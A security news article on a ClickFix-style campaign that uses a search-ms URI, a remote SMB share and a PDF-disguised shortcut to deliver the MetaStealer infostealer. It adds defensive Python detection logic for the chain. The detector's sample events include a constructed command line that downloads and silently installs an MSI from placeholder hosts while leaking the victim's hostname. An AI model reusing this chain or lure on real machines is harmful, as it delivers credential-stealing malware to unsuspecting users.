
From ClickFix to MetaStealer: How Cyber Threats Are Evolving

Summary

– Huntress analysts observed an attack that lured victims with a fake AnyDesk download and a fake Cloudflare verification page, then deployed MetaStealer via an MSI package fetched by a Windows shortcut disguised as a PDF.
– The attack chain opened Windows File Explorer on a remote share through the search-ms URI protocol handler, differing from traditional ClickFix methods, which rely on the Windows Run dialog.
– MetaStealer, an infostealer known since 2022, harvests credentials and files; in this case the shortcut also leaked the victim's hostname to the attacker as a subdomain of the download request.
– Threat actors are evolving their tradecraft by blending social engineering, such as CAPTCHA lures, with multi-stage infection chains and evasive deployment strategies.
– Organizations should teach users to recognize these lures and implement controls beyond blocking the Run dialog, since variants that never touch it already exist.

Cybersecurity professionals are witnessing a rapid evolution in attack methodologies, with threat actors increasingly blending social engineering with technically sophisticated infection chains. Recent observations reveal a shift from traditional ClickFix attacks to more nuanced strategies, including the deployment of MetaStealer malware through disguised installers and legitimate system tools.

Over the past several weeks, security analysts have documented a rise in incidents involving deceptive techniques. One campaign began with a fake AnyDesk download page that imitated the typical ClickFix approach, presenting a counterfeit Cloudflare verification page. Instead of following the expected path through the Run dialog, however, the attack leveraged Windows File Explorer and a shortcut disguised as a PDF to fetch a malicious MSI package that delivered MetaStealer.

In parallel, two separate cases involving the Cephalus ransomware variant were identified. This particular strain employs DLL sideloading via a legitimate SentinelOne executable to activate its payload. These developments underscore how attackers are refining their methods, combining familiar deception tactics with advanced evasion and deployment strategies.

ClickFix campaigns have grown steadily over the past year, capitalizing on users’ willingness to follow instructions involving CAPTCHA prompts. While many attacks adhere to the known pattern, some diverge significantly. In one recent example, a fake AnyDesk download led to a fabricated Cloudflare Turnstile page, a common lure in these schemes.

What set this incident apart was its subsequent behavior. Rather than directing the victim to the Windows Run dialog, the attack utilized the search-ms protocol handler to open Windows File Explorer. From there, users were guided to a remote SMB share where a malicious LNK file, masquerading as a PDF, awaited.

This LNK file executed a multi-stage process: it downloaded a legitimate AnyDesk installer to reduce suspicion while simultaneously retrieving a malicious MSI package from an attacker-controlled server. Notably, the shortcut inserted the victim's hostname, read from an environment variable, into the download request as a subdomain, so the attacker learned which machine had fetched the payload before it even ran.

The MSI package contained several components, including a DLL and a CAB archive housing cleanup scripts and the MetaStealer payload. The final executable, protected with Private EXE Protector, exhibited behaviors consistent with known MetaStealer activity, such as credential harvesting and cryptocurrency wallet theft.

These attacks illustrate a concerning trend: the fusion of social engineering with seemingly routine system processes. By prompting users to interact with familiar interfaces like CAPTCHA verifications or file explorers, attackers increase their chances of bypassing security controls.

Traditional defensive measures, such as restricting access to the Windows Run dialog, no longer suffice on their own: this chain never touched the Run dialog. Practical additions are disabling or restricting the search-ms protocol handler where it is not needed, blocking outbound SMB (TCP 445) from workstations to untrusted networks so remote shares cannot be browsed, and alerting when File Explorer is launched with a search-ms URI that points at a UNC path. Organizations must also broaden their user education efforts, teaching staff to recognize suspicious verification prompts and unusual system behaviors. Continuous monitoring and updated threat intelligence remain critical for identifying and mitigating these evolving threats.
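The chain described above (search-ms handler opening File Explorer on a remote share, a shortcut that fetches a decoy installer and an MSI while leaking the hostname in the URL, then msiexec running the package) leaves a recognizable trail in process-creation telemetry. The following detection logic is an added example written for this page, not code from Huntress or from the incident report. It runs over constructed process-creation records reduced to Sysmon Event ID 1 field names; the share address 203.0.113.10 (a documentation range), the example.invalid domains and the hostname DESKTOP-7H2K are placeholders, not indicators from the case. The LNK itself is not visible as a process, so the rules key on what it launches.

```python
"""Detect the search-ms -> File Explorer -> shortcut -> MSI chain.

Events are dicts with Sysmon Event ID 1 field names (Image, ParentImage,
CommandLine). Sample data is constructed for this example: 203.0.113.0/24
is a documentation range and example.invalid is a reserved name.
"""
import re
from urllib.parse import unquote

# search-ms URI whose crumb=location points at a UNC path: File Explorer is
# being opened on a remote share rather than a local folder.
SEARCH_MS_UNC = re.compile(r"search-ms:[^\"']*?crumb=location:(\\\\[^&\"']+)", re.I)
# msiexec asked to install a package from a URL, a UNC path or a user-writable
# location instead of a program directory or a managed software share.
MSIEXEC_UNTRUSTED = re.compile(
    r"msiexec(?:\.exe)?\b.*?(?:/i|/package)\s+\"?(?:https?://|\\\\|%temp%|[a-z]:\\users\\)", re.I)
# A URL carrying the hostname variable unexpanded (cmd or PowerShell syntax).
HOSTNAME_VAR_IN_URL = re.compile(r"https?://[^\s\"']*(?:%COMPUTERNAME%|\$env:COMPUTERNAME)", re.I)
URL = re.compile(r"https?://", re.I)
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Constructed events in the order the chain produces them, plus two benign
# records (a local folder search and a vendor MSI) that must not fire.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": r'"C:\Windows\explorer.exe" "search-ms:query=AnyDesk&crumb=location:\\203.0.113.10\downloads&displayname=Downloads"'},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'cmd.exe /c curl -s -o %TEMP%\AnyDesk.exe https://decoy.example.invalid/AnyDesk.exe & curl -s -o %TEMP%\reader.msi https://%COMPUTERNAME%.cdn.example.invalid/reader.msi & msiexec /i %TEMP%\reader.msi /qn'},
    {"Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'curl -s -o C:\Users\alice\AppData\Local\Temp\reader.msi https://DESKTOP-7H2K.cdn.example.invalid/reader.msi'},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'msiexec /i C:\Users\alice\AppData\Local\Temp\reader.msi /qn'},
    {"Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\explorer.exe" "search-ms:query=report&crumb=location:C:\Users\alice\Documents"'},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r'msiexec /i C:\Program Files\Vendor\update.msi /qn'},
]


def image_name(path):
    """Basename of an Image/ParentImage path, lower-cased for comparison."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hostname_in_url(cmd, hostname):
    """True when the already-expanded hostname appears as a label of a URL."""
    if not hostname:
        return False
    return re.search(r"https?://[^\s\"']*\b" + re.escape(hostname) + r"\b", cmd, re.I) is not None


def analyze(events, hostname=None):
    """Return (event_index, rule_id, detail) for every rule that fires.

    hostname is the monitored machine's name; when given, URLs carrying the
    expanded value are flagged as well as the unexpanded variable.
    """
    findings = []
    for i, ev in enumerate(events):
        img = image_name(ev.get("Image", ""))
        parent = image_name(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        if img == "explorer.exe":
            # Browsers may hand the URI over percent-encoded, so decode first.
            m = SEARCH_MS_UNC.search(unquote(cmd))
            if m:
                findings.append((i, "search-ms-unc",
                                 f"File Explorer opened on remote share {m.group(1)} (parent {parent})"))
        if img in SCRIPT_HOSTS and parent == "explorer.exe" and URL.search(cmd):
            # A double-clicked shortcut whose target downloads something.
            findings.append((i, "explorer-child-fetch", f"{img} launched by File Explorer fetches from a URL"))
        if HOSTNAME_VAR_IN_URL.search(cmd) or hostname_in_url(cmd, hostname):
            findings.append((i, "hostname-in-url", "victim hostname embedded in a request URL"))
        if MSIEXEC_UNTRUSTED.search(cmd):
            findings.append((i, "msiexec-untrusted-source",
                             "MSI package installed from a URL, share or user-writable path"))
    return findings


if __name__ == "__main__":
    for idx, rule, detail in analyze(SAMPLE_EVENTS, hostname="DESKTOP-7H2K"):
        print(f"event {idx}: {rule}: {detail}")
```

The search-ms rule is the one that distinguishes this variant from a Run-dialog ClickFix and from ordinary local searches: a crumb=location that starts with two backslashes means File Explorer was pointed at a share, and the parent being a browser rather than explorer.exe itself says a web page did the pointing. The msiexec rule is deliberately path-based rather than signature-based, since the package name and the packer (Private EXE Protector here) change between campaigns while "MSI installed from %TEMP% by a cmd one-liner" does not.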

For those seeking deeper insights into current attack methodologies, technical breakdowns of recent incidents are available through dedicated cybersecurity briefings. These sessions provide detailed analyses of emerging malware, attacker tradecraft, and practical defense strategies, helping security teams stay ahead of adversarial innovations.

(Source: Bleeping Computer)
